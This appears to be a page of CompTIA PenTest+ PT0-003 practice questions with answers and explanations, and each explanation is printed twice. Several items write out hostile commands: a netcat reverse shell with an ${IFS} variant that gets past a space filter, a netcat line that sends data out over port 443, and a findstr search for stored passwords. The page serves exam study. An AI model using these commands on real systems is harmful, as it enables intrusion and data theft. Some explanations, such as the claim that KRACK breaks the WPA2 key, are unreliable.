Practice Free PT0-003 Exam Online Questions
Question #71
A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment.
Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?
- A . Rubeus
- B . WinPEAS
- C . NTLMRelayX
- D . Impacket
Correct Answer: A
A
Explanation:
Rubeus is a post-exploitation tool used for Kerberos abuse, including ticket extraction, pass-the-ticket, ticket renewal, and Kerberoasting. It’s ideal for lateral movement within Active Directory environments.
WinPEAS is mainly used for local privilege escalation and enumeration.
NTLMRelayX (from Impacket) is useful for relaying NTLM authentication but is not focused on Kerberos.
Impacket is a collection of tools; Rubeus is more targeted for Kerberos attacks.
Reference: PT0-003 Objective 4.2 C Tools and techniques for lateral movement and manipulating authentication in Windows AD environments.
A
Explanation:
Rubeus is a post-exploitation tool used for Kerberos abuse, including ticket extraction, pass-the-ticket, ticket renewal, and Kerberoasting. It’s ideal for lateral movement within Active Directory environments.
WinPEAS is mainly used for local privilege escalation and enumeration.
NTLMRelayX (from Impacket) is useful for relaying NTLM authentication but is not focused on Kerberos.
Impacket is a collection of tools; Rubeus is more targeted for Kerberos attacks.
Reference: PT0-003 Objective 4.2 C Tools and techniques for lateral movement and manipulating authentication in Windows AD environments.
Question #72
Which of the following frameworks can be used to classify threats?
- A . PTES
- B . STRIDE
- C . OSSTMM
- D . OCTAVE
Correct Answer: B
B
Explanation:
STRIDE is a threat classification model created by Microsoft that breaks down threats into six categories:
Spoofing
Tampering
Repudiation
Information disclosure
Denial of Service
Elevation of privilege
It is specifically designed for threat modeling.
PTES is a general pentesting methodology.
OSSTMM is a framework for operational security testing.
OCTAVE is a risk assessment methodology, not focused on threat classification.
Reference: PT0-003 Objective 3.1 C Understand and apply threat modeling methodologies like
STRIDE.
B
Explanation:
STRIDE is a threat classification model created by Microsoft that breaks down threats into six categories:
Spoofing
Tampering
Repudiation
Information disclosure
Denial of Service
Elevation of privilege
It is specifically designed for threat modeling.
PTES is a general pentesting methodology.
OSSTMM is a framework for operational security testing.
OCTAVE is a risk assessment methodology, not focused on threat classification.
Reference: PT0-003 Objective 3.1 C Understand and apply threat modeling methodologies like
STRIDE.
Question #73
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability.
The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?
- A . ${IFS}
- B . %0a
- C . + *
- D . %20
Correct Answer: A
A
Explanation:
To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}. ${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.
Command Injection:
Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.
Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters like spaces.
Bypassing Filters:
${IFS}: Using ${IFS} instead of a space can bypass filters that block spaces. ${IFS} expands to a space character in shell commands.
Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444.
Alternative Encodings:
%0a: Represents a newline character in URL encoding.
+: Sometimes used in place of space in URLs.
%20: URL encoding for space.
However, ${IFS} is most appropriate for shell command contexts.
Pentest
Reference: Command Injection: Understanding how command injection works and common techniques to exploit it.
Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.
Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.
By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability’s exploitability.
A
Explanation:
To bypass a command injection blocklist that filters out the space character, the tester can use ${IFS}. ${IFS} stands for Internal Field Separator in Unix-like systems, which by default is set to space, tab, and newline characters.
Command Injection:
Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system via a vulnerable application.
Filters or blocklists are often implemented to prevent exploitation by disallowing certain characters like spaces.
Bypassing Filters:
${IFS}: Using ${IFS} instead of a space can bypass filters that block spaces. ${IFS} expands to a space character in shell commands.
Example: The command nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444.
Alternative Encodings:
%0a: Represents a newline character in URL encoding.
+: Sometimes used in place of space in URLs.
%20: URL encoding for space.
However, ${IFS} is most appropriate for shell command contexts.
Pentest
Reference: Command Injection: Understanding how command injection works and common techniques to exploit it.
Bypassing Filters: Using creative methods like environment variable expansion to bypass input filters and execute commands.
Shell Scripting: Knowledge of shell scripting and environment variables is crucial for effective exploitation.
By using ${IFS}, the tester can bypass the filtered space character and execute the intended command, demonstrating the vulnerability’s exploitability.
Question #74
During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing.
Which of the following tools should the tester use?
- A . Mimikatz
- B . ZAP
- C . OllyDbg
- D . SonarQube
Correct Answer: B
B
Explanation:
Dynamic Application Security Testing (DAST):
Definition: DAST involves testing the application in its running state to identify vulnerabilities that could be exploited by an attacker.
Purpose: Simulates attacks on a live application, examining how it behaves and identifying security weaknesses.
ZAP (Zed Attack Proxy):
Description: An open-source DAST tool developed by OWASP.
Features: Capable of scanning web applications for vulnerabilities, including SQL injection, XSS, CSRF, and other common web application vulnerabilities.
Usage: Ideal for dynamic testing as it interacts with the live application and identifies vulnerabilities that may not be visible in static code analysis.
Other Tools:
Mimikatz: Used for post-exploitation activities, specifically credential dumping on Windows systems.
OllyDbg: A debugger used for reverse engineering and static analysis of binary files, not suitable for dynamic testing.
SonarQube: A static code analysis tool used for SAST (Static Application Security Testing), not for dynamic testing.
Pentest
Reference: Web Application Security Testing: Utilizing DAST tools like ZAP to dynamically test and find vulnerabilities in running web applications.
OWASP Tools: Leveraging open-source tools recommended by OWASP for comprehensive security testing.
By using ZAP, the penetration tester can perform dynamic testing to identify runtime vulnerabilities in web applications, extending the scope of the vulnerability search.
B
Explanation:
Dynamic Application Security Testing (DAST):
Definition: DAST involves testing the application in its running state to identify vulnerabilities that could be exploited by an attacker.
Purpose: Simulates attacks on a live application, examining how it behaves and identifying security weaknesses.
ZAP (Zed Attack Proxy):
Description: An open-source DAST tool developed by OWASP.
Features: Capable of scanning web applications for vulnerabilities, including SQL injection, XSS, CSRF, and other common web application vulnerabilities.
Usage: Ideal for dynamic testing as it interacts with the live application and identifies vulnerabilities that may not be visible in static code analysis.
Other Tools:
Mimikatz: Used for post-exploitation activities, specifically credential dumping on Windows systems.
OllyDbg: A debugger used for reverse engineering and static analysis of binary files, not suitable for dynamic testing.
SonarQube: A static code analysis tool used for SAST (Static Application Security Testing), not for dynamic testing.
Pentest
Reference: Web Application Security Testing: Utilizing DAST tools like ZAP to dynamically test and find vulnerabilities in running web applications.
OWASP Tools: Leveraging open-source tools recommended by OWASP for comprehensive security testing.
By using ZAP, the penetration tester can perform dynamic testing to identify runtime vulnerabilities in web applications, extending the scope of the vulnerability search.
Question #75
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy:
Action | SRC
| DEST
| —
Block | 192.168.10.0/24 : 1-65535 | 10.0.0.0/24 : 22 | TCP
Allow | 0.0.0.0/0 : 1-65535 | 192.168.10.0/24: 443 | TCP
Allow | 192.168.10.0/24 : 1-65535 | 0.0.0.0/0: 443 | TCP
Block | . | . | *
Which of the following commands should the tester try next?
- A . tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
- B . gzip /path/to/data && cp data.gz <remote_server> 443
- C . gzip /path/to/data && nc -nvlk 443; cat data.gz ‘ nc -w 3 <remote_server> 22
- D . tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
Correct Answer: A
A
Explanation:
Given the firewall policy, let’s analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic.
The firewall policy rules are:
Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443.
Since the firewall allows outbound connections on port 443 (both within and outside the subnet 192.168.10.0/24), this command adheres to the policy and is the correct choice.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
This command attempts to listen on port 443 and then send data over port 22. However, outbound connections to port 22 are blocked by the firewall, making this command invalid.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
This command uses scp to copy the file, which typically uses port 22 for SSH. Since the firewall blocks port 22, this command will not work.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
A
Explanation:
Given the firewall policy, let’s analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic.
The firewall policy rules are:
Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
This command compresses the data into a tar.gz file and uses nc (netcat) to send it to a remote server on port 443.
Since the firewall allows outbound connections on port 443 (both within and outside the subnet 192.168.10.0/24), this command adheres to the policy and is the correct choice.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
This command attempts to listen on port 443 and then send data over port 22. However, outbound connections to port 22 are blocked by the firewall, making this command invalid.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
This command uses scp to copy the file, which typically uses port 22 for SSH. Since the firewall blocks port 22, this command will not work.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
Question #76
While conducting an assessment, a penetration tester identifies details for several unreleased products announced at a company-wide meeting.
Which of the following attacks did the tester most likely use to discover this information?
- A . Eavesdropping
- B . Bluesnarfing
- C . Credential harvesting
- D . SQL injection attack
Correct Answer: A
A
Explanation:
The tester gained information by listening to a private discussion, which is eavesdropping (passive reconnaissance).
Option A (Eavesdropping) ✅ : Correct.
Involves intercepting conversations via audio, network traffic, or wireless signals.
Option B (Bluesnarfing) ❌ : Stealing data via Bluetooth, which is not mentioned.
Option C (Credential harvesting) ❌ : No password collection occurred.
Option D (SQL injection) ❌ : SQLi affects databases, not voice communications.
Reference: CompTIA PenTest+ PT0-003 Official Guide C OSINT & Eavesdropping Techniques
A
Explanation:
The tester gained information by listening to a private discussion, which is eavesdropping (passive reconnaissance).
Option A (Eavesdropping) ✅ : Correct.
Involves intercepting conversations via audio, network traffic, or wireless signals.
Option B (Bluesnarfing) ❌ : Stealing data via Bluetooth, which is not mentioned.
Option C (Credential harvesting) ❌ : No password collection occurred.
Option D (SQL injection) ❌ : SQLi affects databases, not voice communications.
Reference: CompTIA PenTest+ PT0-003 Official Guide C OSINT & Eavesdropping Techniques
Question #77
During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:
findstr /SIM /C: "pass" *.txt *.cfg *.xml
Which of the following is the penetration tester trying to enumerate?
- A . Configuration files
- B . Permissions
- C . Virtual hosts
- D . Secrets
Correct Answer: D
D
Explanation:
By running the command findstr /SIM /C: "pass" *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.
Command Analysis:
findstr: A command-line utility in Windows used to search for specific strings in files.
/SIM: Combination of options; /S searches for matching files in the current directory and all subdirectories, /I specifies a case-insensitive search, and /M prints only the filenames with matching content.
/C: "pass": Searches for the literal string "pass".
***.txt .cfg .xml: Specifies the file types to search within.
Objective:
The command is searching for the string "pass" within .txt, .cfg, and .xml files, which is indicative of searching for passwords or other sensitive information (secrets).
These file types commonly contain configuration details, credentials, and other sensitive data that might include passwords or secrets.
Other Options:
Configuration files: While .cfg and .xml files can be configuration files, the specific search for "pass" indicates looking for secrets like passwords.
Permissions: This command does not check or enumerate file permissions. Virtual hosts: This command is not related to enumerating virtual hosts. Pentest
Reference: Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation activity after gaining initial access.
Credential Discovery: Searching for stored credentials within configuration files and documents to escalate privileges or move laterally within the network.
By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.
D
Explanation:
By running the command findstr /SIM /C: "pass" *.txt *.cfg *.xml, the penetration tester is trying to enumerate secrets.
Command Analysis:
findstr: A command-line utility in Windows used to search for specific strings in files.
/SIM: Combination of options; /S searches for matching files in the current directory and all subdirectories, /I specifies a case-insensitive search, and /M prints only the filenames with matching content.
/C: "pass": Searches for the literal string "pass".
***.txt .cfg .xml: Specifies the file types to search within.
Objective:
The command is searching for the string "pass" within .txt, .cfg, and .xml files, which is indicative of searching for passwords or other sensitive information (secrets).
These file types commonly contain configuration details, credentials, and other sensitive data that might include passwords or secrets.
Other Options:
Configuration files: While .cfg and .xml files can be configuration files, the specific search for "pass" indicates looking for secrets like passwords.
Permissions: This command does not check or enumerate file permissions. Virtual hosts: This command is not related to enumerating virtual hosts. Pentest
Reference: Post-Exploitation: Enumerating sensitive information like passwords is a common post-exploitation activity after gaining initial access.
Credential Discovery: Searching for stored credentials within configuration files and documents to escalate privileges or move laterally within the network.
By running this command, the penetration tester aims to find stored passwords or other secrets that could help in further exploitation of the target system.
Question #78
During an assessment, a penetration tester compromises some machines but finds that none of the accounts have sufficient access to the target HR database server. In order to enumerate accounts with sufficient permissions, the tester wants to model an attack path before taking further action.
Which of the following tools should the tester use to meet this objective?
- A . Responder
- B . Mimikatz
- C . Hydra
- D . BloodHound
- E . TruffleHog
Correct Answer: D
D
Explanation:
BloodHound is a tool designed for Active Directory attack path analysis.
It enumerates relationships between users, groups, and computers, showing how a low-privileged account can escalate privileges to high-value targets (like the HR database server).
This exactly matches the tester’s objective: modeling attack paths to accounts with sufficient permissions.
Why not the others?
D
Explanation:
BloodHound is a tool designed for Active Directory attack path analysis.
It enumerates relationships between users, groups, and computers, showing how a low-privileged account can escalate privileges to high-value targets (like the HR database server).
This exactly matches the tester’s objective: modeling attack paths to accounts with sufficient permissions.
Why not the others?
Question #79
A penetration tester performs an assessment on the target company’s Kubernetes cluster using kube-hunter.
Which of the following types of vulnerabilities could be detected with the tool?
- A . Network configuration errors in Kubernetes services
- B . Weaknesses and misconfigurations in the Kubernetes cluster
- C . Application deployment issues in Kubernetes
- D . Security vulnerabilities specific to Docker containers
Correct Answer: B
B
Explanation:
kube-hunter is a tool designed to perform security assessments on Kubernetes clusters. It identifies various vulnerabilities, focusing on weaknesses and misconfigurations.
Here ’ s why option B is correct:
Kube-hunter: It scans Kubernetes clusters to identify security issues, such as misconfigurations, insecure settings, and potential attack vectors.
Network Configuration Errors: While kube-hunter might identify some network-related issues, its primary focus is on Kubernetes-specific vulnerabilities and misconfigurations.
Application Deployment Issues: These are more related to the applications running within the cluster, not the cluster configuration itself.
Security Vulnerabilities in Docker Containers: Kube-hunter focuses on the Kubernetes environment rather than Docker container-specific vulnerabilities.
Reference from Pentest:
Forge HTB: Highlights the use of specialized tools to identify misconfigurations in environments, similar to how kube-hunter operates within Kubernetes clusters.
Anubis HTB: Demonstrates the importance of identifying and fixing misconfigurations within complex environments like Kubernetes clusters.
Conclusion:
Option B, weaknesses and misconfigurations in the Kubernetes cluster, accurately describes the type of vulnerabilities that kube-hunter is designed to detect.
B
Explanation:
kube-hunter is a tool designed to perform security assessments on Kubernetes clusters. It identifies various vulnerabilities, focusing on weaknesses and misconfigurations.
Here ’ s why option B is correct:
Kube-hunter: It scans Kubernetes clusters to identify security issues, such as misconfigurations, insecure settings, and potential attack vectors.
Network Configuration Errors: While kube-hunter might identify some network-related issues, its primary focus is on Kubernetes-specific vulnerabilities and misconfigurations.
Application Deployment Issues: These are more related to the applications running within the cluster, not the cluster configuration itself.
Security Vulnerabilities in Docker Containers: Kube-hunter focuses on the Kubernetes environment rather than Docker container-specific vulnerabilities.
Reference from Pentest:
Forge HTB: Highlights the use of specialized tools to identify misconfigurations in environments, similar to how kube-hunter operates within Kubernetes clusters.
Anubis HTB: Demonstrates the importance of identifying and fixing misconfigurations within complex environments like Kubernetes clusters.
Conclusion:
Option B, weaknesses and misconfigurations in the Kubernetes cluster, accurately describes the type of vulnerabilities that kube-hunter is designed to detect.
Question #80
During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption.
Which of the following attacks would accomplish this objective?
- A . ChopChop
- B . Replay
- C . Initialization vector
- D . KRACK
Correct Answer: D
D
Explanation:
To break the key for a Wi-Fi network that uses WPA2 encryption, the penetration tester should use the KRACK (Key Reinstallation Attack) attack.
KRACK (Key Reinstallation Attack):
Definition: KRACK is a vulnerability in the WPA2 protocol that allows attackers to decrypt and potentially inject packets into a Wi-Fi network by manipulating and replaying cryptographic handshake messages.
Impact: This attack exploits flaws in the WPA2 handshake process, allowing an attacker to break the encryption and gain access to the network.
Other Attacks:
ChopChop: Targets WEP encryption, not WPA2.
Replay: Involves capturing and replaying packets to create effects such as duplicating transactions; it does not break WPA2 encryption.
Initialization Vector (IV): Related to weaknesses in WEP, not WPA2.
Pentest
Reference: Wireless Security: Understanding vulnerabilities in Wi-Fi encryption protocols, such as WPA2, and how they can be exploited.
KRACK Attack: A significant vulnerability in WPA2 that requires specific techniques to exploit.
By using the KRACK attack, the penetration tester can break WPA2 encryption and gain unauthorized access to the Wi-Fi network.
Top of Form
Bottom of Form
D
Explanation:
To break the key for a Wi-Fi network that uses WPA2 encryption, the penetration tester should use the KRACK (Key Reinstallation Attack) attack.
KRACK (Key Reinstallation Attack):
Definition: KRACK is a vulnerability in the WPA2 protocol that allows attackers to decrypt and potentially inject packets into a Wi-Fi network by manipulating and replaying cryptographic handshake messages.
Impact: This attack exploits flaws in the WPA2 handshake process, allowing an attacker to break the encryption and gain access to the network.
Other Attacks:
ChopChop: Targets WEP encryption, not WPA2.
Replay: Involves capturing and replaying packets to create effects such as duplicating transactions; it does not break WPA2 encryption.
Initialization Vector (IV): Related to weaknesses in WEP, not WPA2.
Pentest
Reference: Wireless Security: Understanding vulnerabilities in Wi-Fi encryption protocols, such as WPA2, and how they can be exploited.
KRACK Attack: A significant vulnerability in WPA2 that requires specific techniques to exploit.
By using the KRACK attack, the penetration tester can break WPA2 encryption and gain unauthorized access to the Wi-Fi network.
Top of Form
Bottom of Form